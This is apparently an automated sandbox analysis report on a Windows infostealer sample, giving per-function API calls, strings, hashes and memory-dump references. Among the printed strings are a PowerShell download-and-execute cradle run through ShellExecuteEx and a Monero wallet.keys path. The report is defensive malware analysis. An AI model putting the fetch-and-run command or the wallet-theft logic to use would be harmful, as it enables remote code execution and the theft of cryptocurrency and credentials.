                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: ed57d6b5a54bbc7592a7e114e7d84de8923fa8f1ede5b01c5667b69ea9e37de3
                                  • Instruction ID: ddb0ef465a864087693ee5788200b68040f9ddb9af621fb4d00163b39876497f
                                  • Opcode Fuzzy Hash: ed57d6b5a54bbc7592a7e114e7d84de8923fa8f1ede5b01c5667b69ea9e37de3
                                  • Instruction Fuzzy Hash: 203150B690031867DB10FBA0DCC5EFD73BCAB58700F4045D9B35996181EEB4A689CBA5
                                  Function 00BB2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB2D85
                                  Strings
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00BB2D04
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00BB2CC4
                                  • ')", xrefs: 00BB2CB3
                                  • <, xrefs: 00BB2D39
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 9919a6cc394b316290154ddd0992b5fd31a82fa203f3bc7cd6a0e4e7555b42a6
                                  • Instruction ID: a385d5d188405f4f1c236a406f483e4001bcbbcff306607fe4d1494c3942da78
                                  • Opcode Fuzzy Hash: 9919a6cc394b316290154ddd0992b5fd31a82fa203f3bc7cd6a0e4e7555b42a6
                                  • Instruction Fuzzy Hash: 63419D71D10208ABDB14FBA0CCA1FFDB7B8AF14300F504199E156BA591DFB46A4ACF91
                                  Function 00BA9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00BA9F41
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$AllocLocal
                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                  • API String ID: 4171519190-1096346117
                                  • Opcode ID: 1424cad1c6067313c7cb7646aa5e3b87aa6e69e85cfa462b56cb488f2aa69705
                                  • Instruction ID: ac2bad27217e29b0a6d1a6bcfbaa338aaf435baa4146c385f67895e1716e223a
                                  • Opcode Fuzzy Hash: 1424cad1c6067313c7cb7646aa5e3b87aa6e69e85cfa462b56cb488f2aa69705
                                  • Instruction Fuzzy Hash: 21611C74A14248EBDB24EFA4CC96FED77F5AF45300F008458F90AAB591EBB46A05CB52
                                  Function 00BB40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,0140F818,00000000,00020119,?), ref: 00BB40F4
                                  • RegQueryValueExA.ADVAPI32(?,01410A48,00000000,00000000,00000000,000000FF), ref: 00BB4118
                                  • RegCloseKey.ADVAPI32(?), ref: 00BB4122
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB4147
                                  • lstrcat.KERNEL32(?,01410A60), ref: 00BB415B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: 1ea100210dd726da86d5319349ab4296922f22791e6ae38c0d67e3e8753356c8
                                  • Instruction ID: 95727bfa84974ef04f80b7707c615f4fff1d37ed424a34a5d26556407f8afb4a
                                  • Opcode Fuzzy Hash: 1ea100210dd726da86d5319349ab4296922f22791e6ae38c0d67e3e8753356c8
                                  • Instruction Fuzzy Hash: 6F41AE76D0020867DB14FBE4DC86FFD73BDA748300F404599B61596181EA756B88CBF2
                                  Function 00BB6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00BB696C
                                  • sscanf.NTDLL ref: 00BB6999
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BB69B2
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BB69C0
                                  • ExitProcess.KERNEL32 ref: 00BB69DA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 7db10d78cf3fd42a45eaf18d2f075e2c5696fa457eb98642635f5b93605b4d7e
                                  • Instruction ID: 6d64d5096aa075fda757e1e80e1703b5ef5fed713a5110fc15d0a56049e919ad
                                  • Opcode Fuzzy Hash: 7db10d78cf3fd42a45eaf18d2f075e2c5696fa457eb98642635f5b93605b4d7e
                                  • Instruction Fuzzy Hash: D021CB75D14209ABCF04EFE8D985AEEB7F5FF48300F04856AE406E7250EB746609CBA5
                                  Function 00BB7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7E37
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB7E3E
                                  • RegOpenKeyExA.ADVAPI32(80000002,013FBAE0,00000000,00020119,?), ref: 00BB7E5E
                                  • RegQueryValueExA.ADVAPI32(?,0140F8D8,00000000,00000000,000000FF,000000FF), ref: 00BB7E7F
                                  • RegCloseKey.ADVAPI32(?), ref: 00BB7E92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 577c002485f1f85642391b103e90fc454278a082863f2f6ef50358ae4cda2ccf
                                  • Instruction ID: 0ddaef7fb4586e043ff314c1a8c43d0ffc28918c6432d09f69c4cbb0472ed202
                                  • Opcode Fuzzy Hash: 577c002485f1f85642391b103e90fc454278a082863f2f6ef50358ae4cda2ccf
                                  • Instruction Fuzzy Hash: 5C1130B1A44346EBD710DB98DD85FBBBBBCEB44710F104159F605EB380D7B468018BA1
                                  Function 00BB9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • StrStrA.SHLWAPI(014108B0,?,?,?,00BB140C,?,014108B0,00000000), ref: 00BB926C
                                  • lstrcpyn.KERNEL32(00DEAB88,014108B0,014108B0,?,00BB140C,?,014108B0), ref: 00BB9290
                                  • lstrlen.KERNEL32(?,?,00BB140C,?,014108B0), ref: 00BB92A7
                                  • wsprintfA.USER32 ref: 00BB92C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: a73da6e10d1c070a1253927b43a9c993e3a2328456c541e999a91dc2ed4b072e
                                  • Instruction ID: 41fd1c85c2caf995f2d8c4b1fefed5d56442626703a37fdc3111b6c8b03b0269
                                  • Opcode Fuzzy Hash: a73da6e10d1c070a1253927b43a9c993e3a2328456c541e999a91dc2ed4b072e
                                  • Instruction Fuzzy Hash: 2F01C875500249FFCB04EFECC988EAE7BB9EF48355F108588F9099B344C671AA40DBA1
                                  Function 00BA12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BA12B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA12BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BA12D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BA12F5
                                  • RegCloseKey.ADVAPI32(?), ref: 00BA12FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 11f5d0bf370671d56f220fb7d09daf5ec74e6fe6712462ba6ca36b9cb1269fdc
                                  • Instruction ID: cd1117490eb46153fd2969f40f90c26c0a936c3fc4b9003999e91e7edc1eca05
                                  • Opcode Fuzzy Hash: 11f5d0bf370671d56f220fb7d09daf5ec74e6fe6712462ba6ca36b9cb1269fdc
                                  • Instruction Fuzzy Hash: E30136B5A40309BBDB00EFD4DC89FAEB7B8EB48701F008155FA05DB280D670AA018F61
                                  Function 00BBC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: 210fe73bb06019ca14dd5fd8e528faefaae021836a4051eef7475eaab31d4d4f
                                  • Instruction ID: d5660beeb0a750d9ddc36c1a55c91546b00de20b1b876f528a574d82a8752489
                                  • Opcode Fuzzy Hash: 210fe73bb06019ca14dd5fd8e528faefaae021836a4051eef7475eaab31d4d4f
                                  • Instruction Fuzzy Hash: 9941C47150075C5FEB22CB248C85FFB7FE8DB45704F1444E8E9CA96182E2B19A44CF60
                                  Function 00BB6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00BB6663
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB6726
                                  • ExitProcess.KERNEL32 ref: 00BB6755
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: 70b0d9c1450757b22cf9a066b029f1a2cfcd7ddb42e41abf03f99b5ab9faae54
                                  • Instruction ID: 32143d48be0f19e10a7eec40d6556099bafe507cd42fc9922d6e52d7e92ec099
                                  • Opcode Fuzzy Hash: 70b0d9c1450757b22cf9a066b029f1a2cfcd7ddb42e41abf03f99b5ab9faae54
                                  • Instruction Fuzzy Hash: 5431FDB1C01218ABDB14EB54DC95BED77BCAF44300F405199F209B6191DFB46B49CFA6
                                  Function 00BB87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BC0E28,00000000,?), ref: 00BB882F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB8836
                                  • wsprintfA.USER32 ref: 00BB8850
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
